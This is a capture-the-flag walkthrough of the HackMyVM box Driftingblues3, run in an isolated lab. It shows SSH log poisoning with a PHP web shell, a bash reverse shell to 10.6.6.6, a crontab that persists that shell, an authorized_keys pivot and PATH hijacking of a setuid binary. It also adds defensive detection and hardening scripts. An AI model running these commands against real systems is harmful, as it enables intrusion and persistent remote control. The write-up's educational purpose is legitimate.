HackMyVM | Driftingblues3

In this walkthrough, I demonstrate how I obtained complete ownership of Driftingblues3 from HackMyVM
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.95 scan initiated Sat Jan 10 02:23:44 2026 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.31
Nmap scan report for 10.9.9.31
Host is up (0.00046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/eventadmins
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 10 02:23:57 2026 -- 1 IP address (1 host up) scanned in 12.67 seconds
ℹ️
Don't miss the breadcrumbs in the nmap output: the tcp/80 section shows a robots.txt entry for /eventadmins, which is the first place to look.
echo -e '10.9.9.31\t\tdb3.hmv' | sudo tee -a /etc/hosts

Add an entry for "db3.hmv" in hosts file





Service Enumeration

TCP/80

Penetration Testing

Initial Enumeration

ℹ️
Since this box represents more of a CTF challenge than a traditional web app, we'll skip right to the penetration testing phase instead of the usual walking of the application.
SSH seems to be a clue here; the page also points to "/littlequeenofspades.html"
Base64-encoded data colored white so that it blends into the background and looks invisible
echo -n 'aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==' | base64 -d
The first decode yields "intruder? L2FkbWluc2ZpeGl0LnBocA=="; the second token is itself base64 and decodes to "/adminsfixit.php", the path used below
/adminsfixit.php renders the SSH auth log. If we can get PHP into that log somehow, this is a log poisoning opportunity



Testing Log Injection

This should be injectable, since the usernames from failed SSH logins are reflected directly on the page
⚠️
Some older articles will point out that you can do something like ssh "<?php phpinfo(); ?>"@db3.hmv , but more recent versions of the ssh client throw an error about an invalid username, so you'll need another SSH client as a workaround.
hydra -l "<?php echo system(\$_GET['cmd']); ?>" -p '' ssh://db3.hmv

hydra lets us pass an arbitrary username string with special characters; the login fails, but sshd still records the attempted username verbatim in the auth log as an "Invalid user" entry

In the web view the username shows up empty: the page executed the PHP embedded in the log instead of printing it, which confirms the injection works
curl -s 'http://db3.hmv/adminsfixit.php' -G --data-urlencode 'cmd=ls -la'

We'll use -G to tell curl that the data we're passing is for the query string, not the body
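As an added example that is not part of the original walkthrough: the poisoned entry lands in auth.log as an "Invalid user ... from ..." line, because sshd logs the attempted username verbatim when the account does not exist. That same line is what a defender would parse for. The log lines below are constructed for this demo, not captured from the target, and the detection rule is an allowlist on legitimate Linux username characters rather than a blocklist of PHP tags, so it also catches payloads that do not look like PHP.

```bash
#!/usr/bin/env bash
# Added example: find log-poisoning payloads in sshd "Invalid user" lines.
# The log lines below are constructed for this demo, not taken from the target.
SAMPLE_AUTH_LOG=$(cat <<'EOF'
Jan 10 02:31:02 driftingblues sshd[1201]: Invalid user robert from 10.6.6.6 port 50122 ssh2
Jan 10 02:31:05 driftingblues sshd[1203]: Invalid user <?php echo system($_GET['cmd']); ?> from 10.6.6.6 port 50124 ssh2
Jan 10 02:31:09 driftingblues sshd[1205]: Accepted publickey for robertj from 10.9.9.5 port 40112 ssh2
Jan 10 02:31:12 driftingblues sshd[1207]: Invalid user <script>alert(1)</script> from 10.6.6.7 port 50130 ssh2
EOF
)

# Reduce each "Invalid user <name> from <ip> port <n>" line to "<ip> <name>".
# The username is captured greedily so payloads containing spaces survive intact.
invalid_user_attempts() {
  printf '%s\n' "$1" |
    sed -n 's/.*Invalid user \(.*\) from \([0-9a-fA-F.:]*\) port .*/\2 \1/p'
}

# Allowlist check: a legitimate Linux username is [a-z_][a-z0-9_-]*.
# Anything else (PHP tags, HTML, shell metacharacters) is worth a look.
suspicious_attempts() {
  invalid_user_attempts "$1" | grep -Ev '^[^ ]+ [a-z_][a-z0-9_-]*$'
}

# Number of suspicious attempts, for a quick triage metric.
suspicious_count() {
  suspicious_attempts "$1" | wc -l | tr -d ' '
}

# Unique source addresses behind the suspicious attempts.
suspicious_sources() {
  suspicious_attempts "$1" | cut -d' ' -f1 | sort -u
}

printf 'suspicious login attempts (%s):\n' "$(suspicious_count "$SAMPLE_AUTH_LOG")"
suspicious_attempts "$SAMPLE_AUTH_LOG"
printf 'sources:\n'
suspicious_sources "$SAMPLE_AUTH_LOG"
```

Run the script over a real /var/log/auth.log by replacing SAMPLE_AUTH_LOG with `$(cat /var/log/auth.log)`; the "robert" attempt passes the allowlist while both payload usernames are flagged along with the IPs that sent them.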





Exploit

Log Poisoning -> Reverse Shell

sudo rlwrap nc -lnvp 443

Start a TCP socket to catch the reverse shell

curl -s 'http://db3.hmv/adminsfixit.php' -G --data-urlencode 'cmd=/bin/bash -c '"'"'/bin/bash -i >& /dev/tcp/10.6.6.6/443 0>&1'"'"''

The '"'"' sequence closes the single-quoted string, appends a double-quoted single quote, then reopens single quoting; that is how a literal ' ends up inside a single-quoted argument



Persistence

echo '* * * * * /bin/bash -c '"'"'/bin/bash -i >& /dev/tcp/10.6.6.6/443 0>&1'"'"'' > /tmp/crontab.txt

Run the reverse shell callback every minute

crontab /tmp/crontab.txt

Install the job as the "www-data" crontab (note that crontab <file> replaces any existing crontab for the user rather than appending to it)





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

bash: sudo: command not found



Users and Groups

Local Users

robertj:x:1000:1000:,,,:/home/robertj:/bin/bash

Local Groups

robertj:x:1000:
operators:x:1001:root,robertj



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:94:3b:d8 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.30/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 6150sec preferred_lft 6150sec
    inet6 fe80::be24:11ff:fe94:3bd8/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

tcp   LISTEN     0      80              127.0.0.1:3306            0.0.0.0:*



Interesting Files

/usr/bin/getinfo

-r-sr-s--- 1 root operators 16704 Jan  4  2021 /usr/bin/getinfo

The binary is setuid root and setgid operators, and only root and members of operators may execute it. robertj is in operators (see Local Groups above), so we pivot to that account first.

/home/robertj/.ssh

find / -user robertj -writable 2>/dev/null
drwx---rwx 2 robertj robertj 4096 Jan  4  2021 /home/robertj/.ssh

robertj's .ssh directory is world-writable (drwx---rwx), so www-data can create files in it





Privilege Escalation

Lateral to robertj

Writable SSH Directory

ssh-keygen -t rsa -b 4096 -C "" -N "" -f robertj_key

Generate a key pair on attack box

cat ./robertj_key.pub

Copy the public key string to your clipboard

echo 'ssh-rsa AAAAB3NzaC1yc2...[snipped]...' >> /home/robertj/.ssh/authorized_keys

Append the public key to robertj's authorized_keys. The world-writable .ssh directory is what lets www-data create the file; note that sshd's StrictModes (enabled by default) refuses logins when ~/.ssh is world-writable or authorized_keys is owned by another user, so the target is evidently running with it disabled

ssh -i robertj_key robertj@db3.hmv

SSH in as robertj



Becoming Root

SUID File

scp -i robertj_key robertj@db3.hmv:/usr/bin/getinfo .

Copy the file locally for analysis

Looks vulnerable to "$PATH" injection: it shells out to "ip address" by relative name rather than an absolute path, so the binary is resolved through whatever $PATH the caller supplies
echo -e '#!/usr/bin/env bash\n/bin/bash -ip' > /tmp/ip
chmod +x /tmp/ip
export PATH="/tmp:$PATH"
Now, when "/usr/bin/getinfo" is run and calls "ip address", the lookup resolves to "/tmp/ip" first. The -p flag matters: without it, bash sees that the effective uid (root, via the setuid bit) differs from the real uid and drops the privilege before running anything
Very nice!
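To make the mechanism concrete, here is an added, self-contained demonstration that is not part of the original walkthrough. A stand-in script that runs "ip address" by relative name (the assumption being that getinfo behaves the same way, as described above) is hijacked by a fake ip placed first in PATH, while a variant that pins PATH before spawning anything is not. Everything runs in a temporary directory as the current user; no setuid bits are involved, so this only shows the lookup behaviour, not the privilege gain.

```bash
#!/usr/bin/env bash
# Added example: PATH hijacking of a program that calls "ip address" by relative
# name, next to the hardened variant that pins PATH first. These are stand-in
# scripts; the real /usr/bin/getinfo is assumed (not proven here) to behave
# like the vulnerable one.
set -u

demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT

# Vulnerable stand-in: inherits whatever PATH the caller hands it.
cat > "$demo_dir/getinfo_vuln" <<'EOF'
#!/bin/sh
ip address
EOF

# Hardened stand-in: reset PATH to trusted system directories before any
# child is spawned. The C equivalent is setenv("PATH", ...) before system(),
# or calling the binary by absolute path such as /usr/sbin/ip.
cat > "$demo_dir/getinfo_fixed" <<'EOF'
#!/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH
ip address
EOF

# Attacker-controlled directory holding a fake "ip", mirroring the /tmp/ip trick.
mkdir "$demo_dir/hijack"
cat > "$demo_dir/hijack/ip" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
chmod +x "$demo_dir/getinfo_vuln" "$demo_dir/getinfo_fixed" "$demo_dir/hijack/ip"

# Run a stand-in with the hijack directory prepended to PATH and return the
# first line of its output: HIJACKED means the fake ip was picked up.
run_with_hijacked_path() {
  PATH="$demo_dir/hijack:$PATH" "$demo_dir/$1" 2>/dev/null | head -n 1
}

vuln_result()  { run_with_hijacked_path getinfo_vuln; }
fixed_result() { run_with_hijacked_path getinfo_fixed; }

printf 'vulnerable stand-in : %s\n' "$(vuln_result)"
printf 'hardened stand-in   : %s\n' "$(fixed_result)"
```

On a host without the real ip binary the hardened variant prints nothing rather than HIJACKED, which is the point: the attacker's directory never gets consulted once PATH is pinned.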



Flags

User

413fc08db21285b1f8abea99040b0280

Root

dfb7f604a22928afba370d819b35ec83